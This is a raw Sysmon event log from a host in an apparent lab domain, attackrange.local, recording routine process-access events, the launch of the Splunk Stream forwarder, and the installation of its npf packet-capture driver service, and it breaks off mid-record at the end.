10341000x80000000000000004182Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:11.147{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004181Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:11.147{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004180Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:11.147{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004179Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:11.147{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004178Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:11.147{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004177Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:11.147{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004176Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:11.147{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004175Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:11.147{08A6967A-4325-6000-B900-000000009A01}11763032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-432A-6000-E600-000000009A01}4216C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004174Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:10.619{08A6967A-432A-6000-E600-000000009A01}4216C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe-----"C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe" --schemeC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=87264859EE7DE0CED006DBC0D061030F,SHA256=80087865D952613CBC7D9663B1F34B7264B1291278BDD5939C7CCEA334864CF1,IMPHASH=B0958DE096151B4209C7AECE2483DEF3{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004199Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:13.558{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-432D-6000-E700-000000009A01}2468C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004198Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:13.558{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004197Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:13.558{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004196Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:13.558{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004195Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:13.558{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004194Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:13.558{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004193Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:13.558{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004192Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:13.558{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004191Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:13.558{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004190Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:13.558{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004189Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:13.558{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-432D-6000-E700-000000009A01}2468C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004188Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:13.558{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-432D-6000-E700-000000009A01}2468C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004187Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:13.558{08A6967A-432D-6000-E700-000000009A01}2468C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe-----"C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=87264859EE7DE0CED006DBC0D061030F,SHA256=80087865D952613CBC7D9663B1F34B7264B1291278BDD5939C7CCEA334864CF1,IMPHASH=B0958DE096151B4209C7AECE2483DEF3{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004236Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:14.982{08A6967A-432D-6000-E700-000000009A01}24684364C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe+201f2b|C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe+a6c153|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 644600x80000000000000004235Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:14.982C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\npf.sysMD5=DE7FCC77F4A503AF4CA6A47D49B3713D,SHA256=4BFAA99393F635CD05D91A64DE73EDB5639412C129E049F0FE34F88517A10FC6,IMPHASH=CB86059F4B291991E735BECBD4C669CBtrueRiverbed Technology, Inc.Valid 13241300x80000000000000004234Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:12:14.982{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\PACKETDRIVER\NdisMinorVersionDWORD (0x00000000) 13241300x80000000000000004233Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:12:14.982{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\PACKETDRIVER\NdisMajorVersionDWORD (0x00000005) 13241300x80000000000000004232Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:12:14.982{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\npf\TimestampModeDWORD (0x00000000) 13241300x80000000000000004231Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:12:14.982{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\npf\DisplayNamenpf 13241300x80000000000000004230Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localT1031,T1050SetValue2021-01-14 13:12:14.982{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\npf\ImagePath\??\C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\npf.sys 13241300x80000000000000004229Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:12:14.982{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\npf\ErrorControlDWORD (0x00000001) 13241300x80000000000000004228Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localT1031,T1050SetValue2021-01-14 13:12:14.982{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\npf\StartDWORD (0x00000003) 13241300x80000000000000004227Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:12:14.982{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\npf\TypeDWORD (0x00000001) 10341000x80000000000000004226Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:14.904{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-432E-6000-E900-000000009A01}2516C:\Program 